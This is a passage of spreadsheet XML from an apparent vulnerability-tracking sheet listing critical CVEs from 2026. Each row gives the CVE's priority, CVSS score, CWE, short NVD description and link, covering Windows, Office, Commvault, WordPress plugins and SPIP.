      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73009</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73010</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73025</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75430</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>PowerJob Worker version 5.1.2 (and likely earlier versions) exposes the /worker/deployContainer HTTP endpoint without authentication on the default transport port. This allows a remote attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75430</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75816</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Authentication Bypass to Account Takeover in all versions up to, and including, 3.29.12. This is due to the pre_update_value function lacking any capability or ownership check, and ActionPost::conditions_logic() short-circuiting its current_user_can('edit_post') authorization gate whenever the post ID is non-numeric — such as the string user_1 — allowing unauthenticated form submissions to be routed to arbitrary user records without restriction. This makes it possible for unauthenticated attackers to overwrite any user's registered email address, including an administrator's, and then leverage WordPress's native password-reset flow to fully take over the targeted account.</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75816</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77089</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77092</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77098</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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 s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77647</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.026</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.20 allows unauthenticated remote attackers to execute arbitrary code, as exploited in the wild in August 2026. This is related to incorrect identification of &lt;?php blocks, and var_export's mishandling of certain cases such as presence of a '&lt;' character.</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77647</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77806</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.042</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.21 allows unauthenticated remote attackers to execute arbitrary code, as exploited in the wild in August 2026. This is related to code injection via an X-Spip-Filtre HTTP request header that is mishandled by analyse_resultat_skel.</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77806</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78362</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>The SEO Flow by LupsOnline WordPress plugin before 3.0.3 does not correctly validate the credential supplied with its API requests, allowing unauthenticated users to be served as the administrator who configured the SEO Flow by LupsOnline WordPress plugin before 3.0.3 and take over the site. Exploitation requires the SEO Flow by LupsOnline WordPress plugin before 3.0.3 to have been configured, which is its normal operating state.</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78362</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78509</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78510</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79569</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79570</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79574</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
